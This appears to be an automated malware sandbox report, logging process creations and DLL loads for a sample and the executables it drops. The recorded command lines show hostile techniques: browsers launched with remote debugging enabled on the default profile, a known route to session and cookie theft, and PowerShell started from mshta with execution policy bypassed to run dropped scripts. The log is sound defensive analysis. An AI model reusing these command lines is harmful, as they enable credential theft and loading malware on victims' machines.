Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe "C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe "C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe "C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe "C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe "C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsECAFHIIJJE.exe"	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2252 --field-trial-handle=2168,i,14858037877617579678,5688177104923091675,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2268 --field-trial-handle=2224,i,5174629620199250997,17853157087695469379,262144 /prefetch:3	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2276 --field-trial-handle=1924,i,17425948920218244720,978169003850622047,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=7124 --field-trial-handle=1924,i,17425948920218244720,978169003850622047,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7304 --field-trial-handle=1924,i,17425948920218244720,978169003850622047,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2272 --field-trial-handle=1924,i,17425948920218244720,978169003850622047,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7420 --field-trial-handle=1924,i,17425948920218244720,978169003850622047,262144 /prefetch:8
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\DocumentsECAFHIIJJE.exe "C:\Users\user\DocumentsECAFHIIJJE.exe"
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe "C:\Users\user\AppData\Local\Temp\1005627001\file1.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\user\AppData\Local\Temp\1005628041\k4pDgO.ps1"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe "C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe "C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe "C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\ojHpUJVY2.ps1 "

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	Section loaded: apphelp.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	Section loaded: winmm.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	Section loaded: wininet.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	Section loaded: sspicli.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	Section loaded: mstask.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	Section loaded: wldp.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	Section loaded: mpr.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	Section loaded: dui70.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	Section loaded: duser.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	Section loaded: chartv.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	Section loaded: oleacc.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	Section loaded: atlthunk.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	Section loaded: wintypes.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	Section loaded: wintypes.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	Section loaded: wintypes.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	Section loaded: winsta.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	Section loaded: textshaping.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	Section loaded: propsys.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	Section loaded: explorerframe.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	Section loaded: iertutil.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	Section loaded: profapi.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	Section loaded: edputil.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	Section loaded: urlmon.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	Section loaded: srvcli.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	Section loaded: netutils.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	Section loaded: appresolver.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	Section loaded: slc.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	Section loaded: userenv.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	Section loaded: sppc.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
